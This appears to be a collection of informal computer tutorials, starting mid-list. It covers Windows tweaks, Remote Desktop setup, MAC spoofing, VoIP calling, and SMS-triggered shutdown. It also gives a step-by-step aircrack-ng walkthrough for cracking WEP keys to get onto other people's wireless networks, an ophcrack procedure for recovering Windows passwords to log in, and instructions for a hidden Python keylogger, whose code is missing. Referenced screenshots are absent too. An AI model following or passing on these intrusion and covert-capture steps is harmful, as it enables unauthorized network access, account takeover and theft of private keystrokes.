7. Double click on "IDE ATA/ATAPI controllers"

8. Right click on "Primary IDE Channel" and select "Properties".

9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".

10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.

11. Reboot your computer.

WindowsXP should now boot REALLY faster.

How to enable remote desktop in windows 7

Remote desktop is a software that enables you to use your computer when you are not in front of your computer.

First thing you need to do is click on start, right click on my computer, and go to properties, and click on change settings, and remote tab.



Now click on allow connections from computers running any version of remote desktop (less secure) because you can able to connect on other windows operating system. and then click apply and click ok.


Now you can do both things, either change the password by pressing and holding ctrl+alt+del. or you can setup a completely separate user by clicking start and right click my computer and click on manage.



Now on the computer management click on local users and groups, click on users folder and right click on the background and click on new user. Type in your new username and your password. check on user cannot change password and password never expires. and click create and close.



Now go back system properties, click on select users, click on add, and enter the username of the user you just created and click on check names and click ok.



If you have other firewall other than windows firewall, you gonna have to figure out how to open up port 3389 so that it will allow remote desktop connections. now go to cmd and get your ip address by typing ipconfig.


you can remote desktop until you log off your computer. and only one person can remote desktop into client operating system at a time.

After you log off. in other computer, go to start and type in remote desktop. and then type in your ip address and press enter. and type in your username and your password.

How to get access to wireless

To show you how to get access to a wireless network first thing you want to do is go to www.backtrack-linux.org, download the back track 4 final release or bt4-final.iso.

after downloading the iso image burn it into dvd with a free program such as imgburn found in www.imgburn.com. after you successfully burned it to a disk you want to use the disk into a computer with a wireless card and restart the computer so it boots into the dvd.

your desktop should now look like this.

now go down to the task bar and click on the command console icon to launch the command terminal.

the first thing you want to do is startup networking so type in /etc/init.d/networking start.

next you want to set the wireless card into monitor mode so type in airmon-ng to find out what is your wireless card is called. 

then after that type airmon-ng stop [your wireless card name] 

next type airmon-ng start [your wireless card name] to start the wireless card in monitor mode.

after that type airmon-ng again to see the changes. after that you need to scan the wireless signals to get their basic service set identifiers or BSSID, to do this type airodump-ng [ your wireless card name], then see wich ones have a WEP encryption then remember to write down their channel, BSSID and ESSID then hit Ctrl + C to stop. now type airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name] and this will link your wireless card to that particular connection.

now leave that running and open up a new command console and type aireplay-ng -1 0 a [bssid] [wireless card name] which will associate your wireless card with the connection so it can transmit data.

then open up another new command console and type aireplay-ng -3 b [bssid][wireless card name] which will start sending and receiving data packets on the wireless connection.

now just bring up the first command console that you were using and watch the data column, you want this to run until the data hits at least 30,000 which will take about an hour or so. ones it hits 30,000 bring up the third console that is sending and receiving data and hit CTRL+C to stop it.

now type dir to view the root directory and look for a file that ends with .cap because this will have the wireless key. ones you have located the file type in aircrack-ng [filename] and it should give you the wireless key!

How to change your mac address

Check your ip address by going to start button and type in cmd. in the command prompt, type in ipconfig/all now you will see your ip address and your mac address (physical address), and your ip address.

first of all you want to download the free software called the macmakeup. go to google search and go ahead  and type in macmakeup, after downloading it go ahead and extract it. if your using windows vista or windows 7 you will need to right click on macmakeup.exe and choose Run as Administrator.

if you have multiple network card you can choose the one you want to use in from the drop down menu at the top and then to change the mac address you can either choose to generate the random button to generate one base on the mac address or the manufacturers id. you can also select a specific manufacturers id in the drop down menu. and once you have a new mac address, click on the change button and its going to apply the changes. 

now go to the command prompt by going to the start button and typing cmd to reset the internet connection. in the command prompt, type in ipconfig/release and press enter, then type in ipconfig/renew. once you have renew you type ipconfig/all and you should see you have a new ip address.

now before we change the mac address in your router lets find out whats your actual ip address is. to do this go to www.whatismyip.com and write down the ip address that it gave you. now you want to go back to the command prompt and type in ipconfig/all and then find the default gateway. 

now open up a web browser and type in the default gateway into the address bar. once you hit enter it should prompt you with your username and password. once your in find the settings for your router and find the mac address for your router. on some cases depending on a router you have, you can clone the mac address to the router and change it that way. on some cases you can enter your own custom ip address that you can generate using the macmakeup utility. and then when your through apply the changes and wait for your router to reset. now go back to www.whatismyip.com, and see if the ip address is changed.

we already know that you can use computers to make free phone calls. so why not use your smart phone to make a free call?  Here is how it work. google voice the amazing phone routing from google, provides you a free phone number that can anyone call you. then what it does is to forward that call to any phone of your choice. and if you wanted to call out from google voice it will again call any phone of your choice and then connect you using that phone. now this phone sees both incoming and outbound calls from as an incoming call from google voice. so if you have a phone that has an unlimited incoming calls, you will never have to pay a dime.

first you need to have a free sipgate account www.sipgate.com, for those that leave outside the US you need to have a US proxy before you can sign up, but this should still work. if the sipgate is not available then you can use voxox www.voxox.com or ipkall phone.ipcall.com to get a free number. 

once you created an account and assigned you a free US number you can log in and go to setting and click on voip phone. give it a description and click save this will create our phone system, now just mouse over your newly created phone icon, and select sip credentials, write down your sip id and sip password because you are going to need this later. 

now your going to need a google voice account voice.google.com, and again if your outside the US, your going to need a US proxy to sign up but you will still be able to do it. once you able to log in, click on the gear icon and select voice settings. and then click add another phone. call it sipgate and the number that sipgate provide you with.

now for the smartphone, go to android market and search and install google voice, sipdroid and google voice callback. once installed google voice is already setup to receive text notifications and voice mail notifications. 

now setup sipdroid. sipdroid is what you are going to use to connect to your sipgate account. click on your menu button and then click settings. under authorization username enter the sip id and your sip password that you right down earlier, also make sure that your server or proxy is set to sipgate.com and make sure you use WLAN or 3G as checked depending on your preferences. if everything is done you should see a green dot on the top of your screen. 

now setup google voice callback, which will answer any google voice number and then you will use google voice and sipgate to make a free outgoing calls. you can check to use your phones current google voice account assuming that you are already logged in to it, now for outgoing calls choose your sipgate number. then you can choose if you want to always use it or just each time you make a call. now you can click done and give it a try:

From another phone call your google voice number and see if it rings. to make a call just select the phone number from your contacts and click to call them. google voice call back will then calls your sipgate number so your phone will ring and you answer and then it will connect you to your friend or your contacts number.

There is a free program called ophcrack so go ahead and open up a web browser and do a google search for that and it should take you to the website where you can download the iso image.

After downloading use a cd burning program like img burn, or something similar to burn the iso image to a cd. and after burning the file to the cd reboot the computer and you should see a menu like this:

Choose the ophcrack graphic mode and hit enter, and you should see this screen:

and then it will take you to a user interface that will automatically start scanning passwords.

Now you will going to see a list of users in the left hand column and the password on the far right hand column.

Now close it all and reboot the computer and the password recovered should log you in.

How to make a keylogger

Open up a web browser and go to www.python.org to get a copy of the python programming language. click on the download link and download and install python 2.7.2

after you install python in your computer, open up a web browser again and go to pyhook.sourceforge.net, and click on the downloads link and download the pyhook.1.5.1.zip

 

the last thing you are going to download is found in www.sourceforge.net/projects/pywin32 and do to files click on pywin32 and download the pywin32 for python 2.7.2

 

once you have all the necessary files installed, open up the python GUI by clicking the start button and go to all programs go to python 2.6, and select idle python gui. in the interface go to file - new window to start a new project. first thing you want to do is import all the necessary modules that your going to need in order to make this run. the win32 modules are what you are going to use to manipulate the windows environment, such as minimizing windows or making them hidden all together. pythoncom and pyHook provide the necessary code that will interpret the keyboard keys. 

 

when your finish with the script save the file to the drive c: and save as logger.py
now go to drive c and double click on it and you may see a console for a split second but it should go away pretty quick. you can always stop the logger by pressing CTRL+E. whenever you want to see the everything that you just typed, open up drive c and open up output.txt

Shutdown your Computer Using a Cellphone

What you will need is:
1. Outlook and Email
2. kwiry account
3. Txt capable cellphone.

the first thing you want to do is create a file called shutdown.bat to this open up notepad and type in c:\windows\system32\shutdown -s -f -t 00. After that save the file anywhere in the c: drive and make sure the name is shutdown.bat because this is very important.


Next you need to setup a pop3 capable email address. if you don't have one or you don't know, you can sign up for free gmail account.

Next thing you want to is setup microsoft outlook for a pop3 account. so open up microsoft outlook, go to tools email account, click next and add a POP3 account. and then just type in your information. the pop server is pop.gmail.com, smtp server is smtp.gmail.com.click on more setting, make sure to set the outgoing server to enabled, and in incoming pop 3 server type in 995. and then check the boxes below. and then click ok.

The next thing you want to is sign up for kwiry account. open up a web browser, type in www.kwiry.com.

this program allows you to send a txt messages with something in it and it will send it to your email account. so 

Next is to setup a rule in microsoft outlook. the first thing you want to do is setup the send and receive settings so that it updates and check for new messages every minute. then go to tools > Rules and Alerts, and create a new rule. create a blank rule and check the messages when they arrive click next. and check on the box "with specific words in the subject. click on the specific word and type in your kwiry - shutdown. click on add and click ok.

after that you want to check on the box start application. click on application and search for the shutdown.bat that you created earlier. click on next and click on finish. click on apply and ok.

now test by sending a message to kwiry by sending shutdown to 59479 which is your kwiry account. whenever outlook recieves the email its going to start the shutdown.bat
